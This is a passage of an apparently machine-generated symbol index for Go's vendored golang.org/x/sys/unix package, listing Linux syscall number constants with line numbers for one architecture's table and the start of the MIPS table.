SYS_TIMERFD_SETTIME = 86 constant SYS_TIMERFD_GETTIME (line 93) | SYS_TIMERFD_GETTIME = 87 constant SYS_UTIMENSAT (line 94) | SYS_UTIMENSAT = 88 constant SYS_ACCT (line 95) | SYS_ACCT = 89 constant SYS_CAPGET (line 96) | SYS_CAPGET = 90 constant SYS_CAPSET (line 97) | SYS_CAPSET = 91 constant SYS_PERSONALITY (line 98) | SYS_PERSONALITY = 92 constant SYS_EXIT (line 99) | SYS_EXIT = 93 constant SYS_EXIT_GROUP (line 100) | SYS_EXIT_GROUP = 94 constant SYS_WAITID (line 101) | SYS_WAITID = 95 constant SYS_SET_TID_ADDRESS (line 102) | SYS_SET_TID_ADDRESS = 96 constant SYS_UNSHARE (line 103) | SYS_UNSHARE = 97 constant SYS_FUTEX (line 104) | SYS_FUTEX = 98 constant SYS_SET_ROBUST_LIST (line 105) | SYS_SET_ROBUST_LIST = 99 constant SYS_GET_ROBUST_LIST (line 106) | SYS_GET_ROBUST_LIST = 100 constant SYS_NANOSLEEP (line 107) | SYS_NANOSLEEP = 101 constant SYS_GETITIMER (line 108) | SYS_GETITIMER = 102 constant SYS_SETITIMER (line 109) | SYS_SETITIMER = 103 constant SYS_KEXEC_LOAD (line 110) | SYS_KEXEC_LOAD = 104 constant SYS_INIT_MODULE (line 111) | SYS_INIT_MODULE = 105 constant SYS_DELETE_MODULE (line 112) | SYS_DELETE_MODULE = 106 constant SYS_TIMER_CREATE (line 113) | SYS_TIMER_CREATE = 107 constant SYS_TIMER_GETTIME (line 114) | SYS_TIMER_GETTIME = 108 constant SYS_TIMER_GETOVERRUN (line 115) | SYS_TIMER_GETOVERRUN = 109 constant SYS_TIMER_SETTIME (line 116) | SYS_TIMER_SETTIME = 110 constant SYS_TIMER_DELETE (line 117) | SYS_TIMER_DELETE = 111 constant SYS_CLOCK_SETTIME (line 118) | SYS_CLOCK_SETTIME = 112 constant SYS_CLOCK_GETTIME (line 119) | SYS_CLOCK_GETTIME = 113 constant SYS_CLOCK_GETRES (line 120) | SYS_CLOCK_GETRES = 114 constant SYS_CLOCK_NANOSLEEP (line 121) | SYS_CLOCK_NANOSLEEP = 115 constant SYS_SYSLOG (line 122) | SYS_SYSLOG = 116 constant SYS_PTRACE (line 123) | SYS_PTRACE = 117 constant SYS_SCHED_SETPARAM (line 124) | SYS_SCHED_SETPARAM = 118 constant SYS_SCHED_SETSCHEDULER (line 125) | SYS_SCHED_SETSCHEDULER = 119 constant SYS_SCHED_GETSCHEDULER (line 126) | SYS_SCHED_GETSCHEDULER = 120 constant SYS_SCHED_GETPARAM (line 127) | SYS_SCHED_GETPARAM = 121 constant SYS_SCHED_SETAFFINITY (line 128) | SYS_SCHED_SETAFFINITY = 122 constant SYS_SCHED_GETAFFINITY (line 129) | SYS_SCHED_GETAFFINITY = 123 constant SYS_SCHED_YIELD (line 130) | SYS_SCHED_YIELD = 124 constant SYS_SCHED_GET_PRIORITY_MAX (line 131) | SYS_SCHED_GET_PRIORITY_MAX = 125 constant SYS_SCHED_GET_PRIORITY_MIN (line 132) | SYS_SCHED_GET_PRIORITY_MIN = 126 constant SYS_SCHED_RR_GET_INTERVAL (line 133) | SYS_SCHED_RR_GET_INTERVAL = 127 constant SYS_RESTART_SYSCALL (line 134) | SYS_RESTART_SYSCALL = 128 constant SYS_KILL (line 135) | SYS_KILL = 129 constant SYS_TKILL (line 136) | SYS_TKILL = 130 constant SYS_TGKILL (line 137) | SYS_TGKILL = 131 constant SYS_SIGALTSTACK (line 138) | SYS_SIGALTSTACK = 132 constant SYS_RT_SIGSUSPEND (line 139) | SYS_RT_SIGSUSPEND = 133 constant SYS_RT_SIGACTION (line 140) | SYS_RT_SIGACTION = 134 constant SYS_RT_SIGPROCMASK (line 141) | SYS_RT_SIGPROCMASK = 135 constant SYS_RT_SIGPENDING (line 142) | SYS_RT_SIGPENDING = 136 constant SYS_RT_SIGTIMEDWAIT (line 143) | SYS_RT_SIGTIMEDWAIT = 137 constant SYS_RT_SIGQUEUEINFO (line 144) | SYS_RT_SIGQUEUEINFO = 138 constant SYS_RT_SIGRETURN (line 145) | SYS_RT_SIGRETURN = 139 constant SYS_SETPRIORITY (line 146) | SYS_SETPRIORITY = 140 constant SYS_GETPRIORITY (line 147) | SYS_GETPRIORITY = 141 constant SYS_REBOOT (line 148) | SYS_REBOOT = 142 constant SYS_SETREGID (line 149) | SYS_SETREGID = 143 constant SYS_SETGID (line 150) | SYS_SETGID = 144 constant SYS_SETREUID (line 151) | SYS_SETREUID = 145 constant SYS_SETUID (line 152) | SYS_SETUID = 146 constant SYS_SETRESUID (line 153) | SYS_SETRESUID = 147 constant SYS_GETRESUID (line 154) | SYS_GETRESUID = 148 constant SYS_SETRESGID (line 155) | SYS_SETRESGID = 149 constant SYS_GETRESGID (line 156) | SYS_GETRESGID = 150 constant SYS_SETFSUID (line 157) | SYS_SETFSUID = 151 constant SYS_SETFSGID (line 158) | SYS_SETFSGID = 152 constant SYS_TIMES (line 159) | SYS_TIMES = 153 constant SYS_SETPGID (line 160) | SYS_SETPGID = 154 constant SYS_GETPGID (line 161) | SYS_GETPGID = 155 constant SYS_GETSID (line 162) | SYS_GETSID = 156 constant SYS_SETSID (line 163) | SYS_SETSID = 157 constant SYS_GETGROUPS (line 164) | SYS_GETGROUPS = 158 constant SYS_SETGROUPS (line 165) | SYS_SETGROUPS = 159 constant SYS_UNAME (line 166) | SYS_UNAME = 160 constant SYS_SETHOSTNAME (line 167) | SYS_SETHOSTNAME = 161 constant SYS_SETDOMAINNAME (line 168) | SYS_SETDOMAINNAME = 162 constant SYS_GETRUSAGE (line 169) | SYS_GETRUSAGE = 165 constant SYS_UMASK (line 170) | SYS_UMASK = 166 constant SYS_PRCTL (line 171) | SYS_PRCTL = 167 constant SYS_GETCPU (line 172) | SYS_GETCPU = 168 constant SYS_GETTIMEOFDAY (line 173) | SYS_GETTIMEOFDAY = 169 constant SYS_SETTIMEOFDAY (line 174) | SYS_SETTIMEOFDAY = 170 constant SYS_ADJTIMEX (line 175) | SYS_ADJTIMEX = 171 constant SYS_GETPID (line 176) | SYS_GETPID = 172 constant SYS_GETPPID (line 177) | SYS_GETPPID = 173 constant SYS_GETUID (line 178) | SYS_GETUID = 174 constant SYS_GETEUID (line 179) | SYS_GETEUID = 175 constant SYS_GETGID (line 180) | SYS_GETGID = 176 constant SYS_GETEGID (line 181) | SYS_GETEGID = 177 constant SYS_GETTID (line 182) | SYS_GETTID = 178 constant SYS_SYSINFO (line 183) | SYS_SYSINFO = 179 constant SYS_MQ_OPEN (line 184) | SYS_MQ_OPEN = 180 constant SYS_MQ_UNLINK (line 185) | SYS_MQ_UNLINK = 181 constant SYS_MQ_TIMEDSEND (line 186) | SYS_MQ_TIMEDSEND = 182 constant SYS_MQ_TIMEDRECEIVE (line 187) | SYS_MQ_TIMEDRECEIVE = 183 constant SYS_MQ_NOTIFY (line 188) | SYS_MQ_NOTIFY = 184 constant SYS_MQ_GETSETATTR (line 189) | SYS_MQ_GETSETATTR = 185 constant SYS_MSGGET (line 190) | SYS_MSGGET = 186 constant SYS_MSGCTL (line 191) | SYS_MSGCTL = 187 constant SYS_MSGRCV (line 192) | SYS_MSGRCV = 188 constant SYS_MSGSND (line 193) | SYS_MSGSND = 189 constant SYS_SEMGET (line 194) | SYS_SEMGET = 190 constant SYS_SEMCTL (line 195) | SYS_SEMCTL = 191 constant SYS_SEMTIMEDOP (line 196) | SYS_SEMTIMEDOP = 192 constant SYS_SEMOP (line 197) | SYS_SEMOP = 193 constant SYS_SHMGET (line 198) | SYS_SHMGET = 194 constant SYS_SHMCTL (line 199) | SYS_SHMCTL = 195 constant SYS_SHMAT (line 200) | SYS_SHMAT = 196 constant SYS_SHMDT (line 201) | SYS_SHMDT = 197 constant SYS_SOCKET (line 202) | SYS_SOCKET = 198 constant SYS_SOCKETPAIR (line 203) | SYS_SOCKETPAIR = 199 constant SYS_BIND (line 204) | SYS_BIND = 200 constant SYS_LISTEN (line 205) | SYS_LISTEN = 201 constant SYS_ACCEPT (line 206) | SYS_ACCEPT = 202 constant SYS_CONNECT (line 207) | SYS_CONNECT = 203 constant SYS_GETSOCKNAME (line 208) | SYS_GETSOCKNAME = 204 constant SYS_GETPEERNAME (line 209) | SYS_GETPEERNAME = 205 constant SYS_SENDTO (line 210) | SYS_SENDTO = 206 constant SYS_RECVFROM (line 211) | SYS_RECVFROM = 207 constant SYS_SETSOCKOPT (line 212) | SYS_SETSOCKOPT = 208 constant SYS_GETSOCKOPT (line 213) | SYS_GETSOCKOPT = 209 constant SYS_SHUTDOWN (line 214) | SYS_SHUTDOWN = 210 constant SYS_SENDMSG (line 215) | SYS_SENDMSG = 211 constant SYS_RECVMSG (line 216) | SYS_RECVMSG = 212 constant SYS_READAHEAD (line 217) | SYS_READAHEAD = 213 constant SYS_BRK (line 218) | SYS_BRK = 214 constant SYS_MUNMAP (line 219) | SYS_MUNMAP = 215 constant SYS_MREMAP (line 220) | SYS_MREMAP = 216 constant SYS_ADD_KEY (line 221) | SYS_ADD_KEY = 217 constant SYS_REQUEST_KEY (line 222) | SYS_REQUEST_KEY = 218 constant SYS_KEYCTL (line 223) | SYS_KEYCTL = 219 constant SYS_CLONE (line 224) | SYS_CLONE = 220 constant SYS_EXECVE (line 225) | SYS_EXECVE = 221 constant SYS_MMAP (line 226) | SYS_MMAP = 222 constant SYS_FADVISE64 (line 227) | SYS_FADVISE64 = 223 constant SYS_SWAPON (line 228) | SYS_SWAPON = 224 constant SYS_SWAPOFF (line 229) | SYS_SWAPOFF = 225 constant SYS_MPROTECT (line 230) | SYS_MPROTECT = 226 constant SYS_MSYNC (line 231) | SYS_MSYNC = 227 constant SYS_MLOCK (line 232) | SYS_MLOCK = 228 constant SYS_MUNLOCK (line 233) | SYS_MUNLOCK = 229 constant SYS_MLOCKALL (line 234) | SYS_MLOCKALL = 230 constant SYS_MUNLOCKALL (line 235) | SYS_MUNLOCKALL = 231 constant SYS_MINCORE (line 236) | SYS_MINCORE = 232 constant SYS_MADVISE (line 237) | SYS_MADVISE = 233 constant SYS_REMAP_FILE_PAGES (line 238) | SYS_REMAP_FILE_PAGES = 234 constant SYS_MBIND (line 239) | SYS_MBIND = 235 constant SYS_GET_MEMPOLICY (line 240) | SYS_GET_MEMPOLICY = 236 constant SYS_SET_MEMPOLICY (line 241) | SYS_SET_MEMPOLICY = 237 constant SYS_MIGRATE_PAGES (line 242) | SYS_MIGRATE_PAGES = 238 constant SYS_MOVE_PAGES (line 243) | SYS_MOVE_PAGES = 239 constant SYS_RT_TGSIGQUEUEINFO (line 244) | SYS_RT_TGSIGQUEUEINFO = 240 constant SYS_PERF_EVENT_OPEN (line 245) | SYS_PERF_EVENT_OPEN = 241 constant SYS_ACCEPT4 (line 246) | SYS_ACCEPT4 = 242 constant SYS_RECVMMSG (line 247) | SYS_RECVMMSG = 243 constant SYS_ARCH_SPECIFIC_SYSCALL (line 248) | SYS_ARCH_SPECIFIC_SYSCALL = 244 constant SYS_WAIT4 (line 249) | SYS_WAIT4 = 260 constant SYS_PRLIMIT64 (line 250) | SYS_PRLIMIT64 = 261 constant SYS_FANOTIFY_INIT (line 251) | SYS_FANOTIFY_INIT = 262 constant SYS_FANOTIFY_MARK (line 252) | SYS_FANOTIFY_MARK = 263 constant SYS_NAME_TO_HANDLE_AT (line 253) | SYS_NAME_TO_HANDLE_AT = 264 constant SYS_OPEN_BY_HANDLE_AT (line 254) | SYS_OPEN_BY_HANDLE_AT = 265 constant SYS_CLOCK_ADJTIME (line 255) | SYS_CLOCK_ADJTIME = 266 constant SYS_SYNCFS (line 256) | SYS_SYNCFS = 267 constant SYS_SETNS (line 257) | SYS_SETNS = 268 constant SYS_SENDMMSG (line 258) | SYS_SENDMMSG = 269 constant SYS_PROCESS_VM_READV (line 259) | SYS_PROCESS_VM_READV = 270 constant SYS_PROCESS_VM_WRITEV (line 260) | SYS_PROCESS_VM_WRITEV = 271 constant SYS_KCMP (line 261) | SYS_KCMP = 272 constant SYS_FINIT_MODULE (line 262) | SYS_FINIT_MODULE = 273 constant SYS_SCHED_SETATTR (line 263) | SYS_SCHED_SETATTR = 274 constant SYS_SCHED_GETATTR (line 264) | SYS_SCHED_GETATTR = 275 constant SYS_RENAMEAT2 (line 265) | SYS_RENAMEAT2 = 276 constant SYS_SECCOMP (line 266) | SYS_SECCOMP = 277 constant SYS_GETRANDOM (line 267) | SYS_GETRANDOM = 278 constant SYS_MEMFD_CREATE (line 268) | SYS_MEMFD_CREATE = 279 constant SYS_BPF (line 269) | SYS_BPF = 280 constant SYS_EXECVEAT (line 270) | SYS_EXECVEAT = 281 constant SYS_USERFAULTFD (line 271) | SYS_USERFAULTFD = 282 constant SYS_MEMBARRIER (line 272) | SYS_MEMBARRIER = 283 constant SYS_MLOCK2 (line 273) | SYS_MLOCK2 = 284 constant SYS_COPY_FILE_RANGE (line 274) | SYS_COPY_FILE_RANGE = 285 constant SYS_PREADV2 (line 275) | SYS_PREADV2 = 286 constant SYS_PWRITEV2 (line 276) | SYS_PWRITEV2 = 287 constant SYS_PKEY_MPROTECT (line 277) | SYS_PKEY_MPROTECT = 288 constant SYS_PKEY_ALLOC (line 278) | SYS_PKEY_ALLOC = 289 constant SYS_PKEY_FREE (line 279) | SYS_PKEY_FREE = 290 constant SYS_STATX (line 280) | SYS_STATX = 291 constant SYS_IO_PGETEVENTS (line 281) | SYS_IO_PGETEVENTS = 292 constant SYS_RSEQ (line 282) | SYS_RSEQ = 293 constant SYS_KEXEC_FILE_LOAD (line 283) | SYS_KEXEC_FILE_LOAD = 294 constant SYS_PIDFD_SEND_SIGNAL (line 284) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 285) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 286) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 287) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 288) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 289) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 290) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 291) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 292) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 293) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 294) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 295) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 296) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 297) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 298) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 299) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 300) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 301) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 302) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 303) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 304) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 305) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 306) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 307) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 308) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 309) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 310) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 311) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 312) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 313) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 314) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 315) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_mips.go constant SYS_SYSCALL (line 9) | SYS_SYSCALL = 4000 constant SYS_EXIT (line 10) | SYS_EXIT = 4001 constant SYS_FORK (line 11) | SYS_FORK = 4002 constant SYS_READ (line 12) | SYS_READ = 4003 constant SYS_WRITE (line 13) | SYS_WRITE = 4004 constant SYS_OPEN (line 14) | SYS_OPEN = 4005 constant SYS_CLOSE (line 15) | SYS_CLOSE = 4006 constant SYS_WAITPID (line 16) | SYS_WAITPID = 4007 constant SYS_CREAT (line 17) | SYS_CREAT = 4008 constant SYS_LINK (line 18) | SYS_LINK = 4009 constant SYS_UNLINK (line 19) | SYS_UNLINK = 4010 constant SYS_EXECVE (line 20) | SYS_EXECVE = 4011 constant SYS_CHDIR (line 21) | SYS_CHDIR = 4012 constant SYS_TIME (line 22) | SYS_TIME = 4013 constant SYS_MKNOD (line 23) | SYS_MKNOD = 4014 constant SYS_CHMOD (line 24) | SYS_CHMOD = 4015 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 4016 constant SYS_BREAK (line 26) | SYS_BREAK = 4017 constant SYS_UNUSED18 (line 27) | SYS_UNUSED18 = 4018 constant SYS_LSEEK (line 28) | SYS_LSEEK = 4019 constant SYS_GETPID (line 29) | SYS_GETPID = 4020 constant SYS_MOUNT (line 30) | SYS_MOUNT = 4021 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 4022 constant SYS_SETUID (line 32) | SYS_SETUID = 4023 constant SYS_GETUID (line 33) | SYS_GETUID = 4024 constant SYS_STIME (line 34) | SYS_STIME = 4025 constant SYS_PTRACE (line 35) | SYS_PTRACE = 4026 constant SYS_ALARM (line 36) | SYS_ALARM = 4027 constant SYS_UNUSED28 (line 37) | SYS_UNUSED28 = 4028 constant SYS_PAUSE (line 38) | SYS_PAUSE = 4029 constant SYS_UTIME (line 39) | SYS_UTIME = 4030 constant SYS_STTY (line 40) | SYS_STTY = 4031 constant SYS_GTTY (line 41) | SYS_GTTY = 4032 constant SYS_ACCESS (line 42) | SYS_ACCESS = 4033 constant SYS_NICE (line 43) | SYS_NICE = 4034 constant SYS_FTIME (line 44) | SYS_FTIME = 4035 constant SYS_SYNC (line 45) | SYS_SYNC = 4036 constant SYS_KILL (line 46) | SYS_KILL = 4037 constant SYS_RENAME (line 47) | SYS_RENAME = 4038 constant SYS_MKDIR (line 48) | SYS_MKDIR = 4039 constant SYS_RMDIR (line 49) | SYS_RMDIR = 4040 constant SYS_DUP (line 50) | SYS_DUP = 4041 constant SYS_PIPE (line 51) | SYS_PIPE = 4042 constant SYS_TIMES (line 52) | SYS_TIMES = 4043 constant SYS_PROF (line 53) | SYS_PROF = 4044 constant SYS_BRK (line 54) | SYS_BRK = 4045 constant SYS_SETGID (line 55) | SYS_SETGID = 4046 constant SYS_GETGID (line 56) | SYS_GETGID = 4047 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 4048 constant SYS_GETEUID (line 58) | SYS_GETEUID = 4049 constant SYS_GETEGID (line 59) | SYS_GETEGID = 4050 constant SYS_ACCT (line 60) | SYS_ACCT = 4051 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 4052 constant SYS_LOCK (line 62) | SYS_LOCK = 4053 constant SYS_IOCTL (line 63) | SYS_IOCTL = 4054 constant SYS_FCNTL (line 64) | SYS_FCNTL = 4055 constant SYS_MPX (line 65) | SYS_MPX = 4056 constant SYS_SETPGID (line 66) | SYS_SETPGID = 4057 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 4058 constant SYS_UNUSED59 (line 68) | SYS_UNUSED59 = 4059 constant SYS_UMASK (line 69) | SYS_UMASK = 4060 constant SYS_CHROOT (line 70) | SYS_CHROOT = 4061 constant SYS_USTAT (line 71) | SYS_USTAT = 4062 constant SYS_DUP2 (line 72) | SYS_DUP2 = 4063 constant SYS_GETPPID (line 73) | SYS_GETPPID = 4064 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 4065 constant SYS_SETSID (line 75) | SYS_SETSID = 4066 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 4067 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 4068 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 4069 constant SYS_SETREUID (line 79) | SYS_SETREUID = 4070 constant SYS_SETREGID (line 80) | SYS_SETREGID = 4071 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 4072 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 4073 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 4074 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 4075 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 4076 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 4077 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 4078 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 4079 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 4080 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 4081 constant SYS_RESERVED82 (line 91) | SYS_RESERVED82 = 4082 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 4083 constant SYS_UNUSED84 (line 93) | SYS_UNUSED84 = 4084 constant SYS_READLINK (line 94) | SYS_READLINK = 4085 constant SYS_USELIB (line 95) | SYS_USELIB = 4086 constant SYS_SWAPON (line 96) | SYS_SWAPON = 4087 constant SYS_REBOOT (line 97) | SYS_REBOOT = 4088 constant SYS_READDIR (line 98) | SYS_READDIR = 4089 constant SYS_MMAP (line 99) | SYS_MMAP = 4090 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 4091 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 4092 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 4093 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 4094 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 4095 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 4096 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 4097 constant SYS_PROFIL (line 107) | SYS_PROFIL = 4098 constant SYS_STATFS (line 108) | SYS_STATFS = 4099 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 4100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 4101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 4102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 4103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 4104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 4105 constant SYS_STAT (line 115) | SYS_STAT = 4106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 4107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 4108 constant SYS_UNUSED109 (line 118) | SYS_UNUSED109 = 4109 constant SYS_IOPL (line 119) | SYS_IOPL = 4110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 4111 constant SYS_IDLE (line 121) | SYS_IDLE = 4112 constant SYS_VM86 (line 122) | SYS_VM86 = 4113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 4114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 4115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 4116 constant SYS_IPC (line 126) | SYS_IPC = 4117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 4118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 4119 constant SYS_CLONE (line 129) | SYS_CLONE = 4120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 4121 constant SYS_UNAME (line 131) | SYS_UNAME = 4122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 4123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 4124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 4125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 4126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 4127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 4128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 4129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 4130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 4131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 4132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 4133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 4134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 4135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 4136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 4137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 4138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 4139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 4140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 4141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 4142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 4143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 4144 constant SYS_READV (line 154) | SYS_READV = 4145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 4146 constant SYS_CACHEFLUSH (line 156) | SYS_CACHEFLUSH = 4147 constant SYS_CACHECTL (line 157) | SYS_CACHECTL = 4148 constant SYS_SYSMIPS (line 158) | SYS_SYSMIPS = 4149 constant SYS_UNUSED150 (line 159) | SYS_UNUSED150 = 4150 constant SYS_GETSID (line 160) | SYS_GETSID = 4151 constant SYS_FDATASYNC (line 161) | SYS_FDATASYNC = 4152 constant SYS__SYSCTL (line 162) | SYS__SYSCTL = 4153 constant SYS_MLOCK (line 163) | SYS_MLOCK = 4154 constant SYS_MUNLOCK (line 164) | SYS_MUNLOCK = 4155 constant SYS_MLOCKALL (line 165) | SYS_MLOCKALL = 4156 constant SYS_MUNLOCKALL (line 166) | SYS_MUNLOCKALL = 4157 constant SYS_SCHED_SETPARAM (line 167) | SYS_SCHED_SETPARAM = 4158 constant SYS_SCHED_GETPARAM (line 168) | SYS_SCHED_GETPARAM = 4159 constant SYS_SCHED_SETSCHEDULER (line 169) | SYS_SCHED_SETSCHEDULER = 4160 constant SYS_SCHED_GETSCHEDULER (line 170) | SYS_SCHED_GETSCHEDULER = 4161 constant SYS_SCHED_YIELD (line 171) | SYS_SCHED_YIELD = 4162 constant SYS_SCHED_GET_PRIORITY_MAX (line 172) | SYS_SCHED_GET_PRIORITY_MAX = 4163 constant SYS_SCHED_GET_PRIORITY_MIN (line 173) | SYS_SCHED_GET_PRIORITY_MIN = 4164 constant SYS_SCHED_RR_GET_INTERVAL (line 174) | SYS_SCHED_RR_GET_INTERVAL = 4165 constant SYS_NANOSLEEP (line 175) | SYS_NANOSLEEP = 4166 constant SYS_MREMAP (line 176) | SYS_MREMAP = 4167 constant SYS_ACCEPT (line 177) | SYS_ACCEPT = 4168 constant SYS_BIND (line 178) | SYS_BIND = 4169 constant SYS_CONNECT (line 179) | SYS_CONNECT = 4170 constant SYS_GETPEERNAME (line 180) | SYS_GETPEERNAME = 4171 constant SYS_GETSOCKNAME (line 181) | SYS_GETSOCKNAME = 4172 constant SYS_GETSOCKOPT (line 182) | SYS_GETSOCKOPT = 4173 constant SYS_LISTEN (line 183) | SYS_LISTEN = 4174 constant SYS_RECV (line 184) | SYS_RECV = 4175 constant SYS_RECVFROM (line 185) | SYS_RECVFROM = 4176 constant SYS_RECVMSG (line 186) | SYS_RECVMSG = 4177 constant SYS_SEND (line 187) | SYS_SEND = 4178 constant SYS_SENDMSG (line 188) | SYS_SENDMSG = 4179 constant SYS_SENDTO (line 189) | SYS_SENDTO = 4180 constant SYS_SETSOCKOPT (line 190) | SYS_SETSOCKOPT = 4181 constant SYS_SHUTDOWN (line 191) | SYS_SHUTDOWN = 4182 constant SYS_SOCKET (line 192) | SYS_SOCKET = 4183 constant SYS_SOCKETPAIR (line 193) | SYS_SOCKETPAIR = 4184 constant SYS_SETRESUID (line 194) | SYS_SETRESUID = 4185 constant SYS_GETRESUID (line 195) | SYS_GETRESUID = 4186 constant SYS_QUERY_MODULE (line 196) | SYS_QUERY_MODULE = 4187 constant SYS_POLL (line 197) | SYS_POLL = 4188 constant SYS_NFSSERVCTL (line 198) | SYS_NFSSERVCTL = 4189 constant SYS_SETRESGID (line 199) | SYS_SETRESGID = 4190 constant SYS_GETRESGID (line 200) | SYS_GETRESGID = 4191 constant SYS_PRCTL (line 201) | SYS_PRCTL = 4192 constant SYS_RT_SIGRETURN (line 202) | SYS_RT_SIGRETURN = 4193 constant SYS_RT_SIGACTION (line 203) | SYS_RT_SIGACTION = 4194 constant SYS_RT_SIGPROCMASK (line 204) | SYS_RT_SIGPROCMASK = 4195 constant SYS_RT_SIGPENDING (line 205) | SYS_RT_SIGPENDING = 4196 constant SYS_RT_SIGTIMEDWAIT (line 206) | SYS_RT_SIGTIMEDWAIT = 4197 constant SYS_RT_SIGQUEUEINFO (line 207) | SYS_RT_SIGQUEUEINFO = 4198 constant SYS_RT_SIGSUSPEND (line 208) | SYS_RT_SIGSUSPEND = 4199 constant SYS_PREAD64 (line 209) | SYS_PREAD64 = 4200 constant SYS_PWRITE64 (line 210) | SYS_PWRITE64 = 4201 